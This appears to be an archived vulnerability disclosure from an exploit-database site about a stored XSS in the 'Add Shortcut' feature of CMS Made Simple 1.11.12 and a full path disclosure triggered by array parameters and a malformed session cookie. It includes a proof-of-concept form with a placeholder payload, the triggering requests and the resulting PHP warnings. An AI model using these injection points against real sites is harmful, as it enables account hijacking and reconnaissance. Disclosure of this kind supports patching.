Lucene search

K

Cms madesimple 1.11.12 - Persistant XSS / Full Path Disclosure Vulnerabilities

🗓️ 11 Oct 2015 00:00:00Reported by ZwXType 
zdt
 zdt
🔗 0day.today👁 25 Views

Stored XSS and Full Path Disclosure in CMS MadeSimple 1.11.1

Show more
Code
# Author : ZwX
# Date : 09/02/2015
# Download : http://www.cmsmadesimple.fr/telecharger-cms
# Vendor : http://www.cmsmadesimple.fr/
# Tested on : Windows 7 

+=====================+
     Description : 
+=====================+

Stored Cross Site Scripting vulnerability that is discovered in the user login interface.
Module : (Manage Shortcuts) and click (Add Shortcut)

+=====================+
  Proof Of Concept : 
+=====================+

<form method="post" action="addbookmark.php?_sx_=9136d3ce1a6e559c">
<input type="hidden" name="_sx_" value="9136d3ce1a6e559c" />
<div class="pageoverflow">
<p class="pagetext">Title:</p>
<p class="pageinput"><input type="text" name="title" maxlength="255" value="[XSS Stored Here]" /></p>
<input type="hidden" name="addbookmark" value="true" />
<input type="submit" value="Submit" class="pagebutton" />
<input type="submit" name="cancel" value="Cancel" class="pagebutton" />
</div>
</form>

+=====================+
     Description : 
+=====================+

# A vulnerability displays the full path to the vulnerable script while indicating the type of vulnerability:
trim()

# Vulnerability lies in the page.functions.php file

+=====================+
  Proof Of Concept : 
+=====================+

/index.php?page[]=minimal-template

Results : Warning: trim() expects parameter 1 to be string, array given in 
          C:\Program Files\EasyPHP-DevServer-14.1VC11\data\localweb\projects\cmsmadesimple\lib\page.functions.php on line 803
		  
Injection TamperData Cookie : 

_sx_=f07a39ba13846fce; 
cms_admin_user_id=1; 
cms_passhash=02d21a40e06c430127cca40a20243f22; 
PHPSESSID=jihp50tjff0kdkqjdnelkmmig4; CMSSESSID1ae59f24=//setcookie()

Results : Warning: session_start(): 
          The session id is too long or contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in C:
		  \Program Files\EasyPHP-DevServer-14.1VC11\data\localweb\projects\cmsmadesimple\include.php on line 50  
	

[#] 09/02/2015: Vulnerability found
[#] 09/02/2015: Vendor informed
[#] 16/02/2015: No new vendor
[#] 16/02/2015: Vulnerability disclosure

#  0day.today [2018-03-14]  #

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo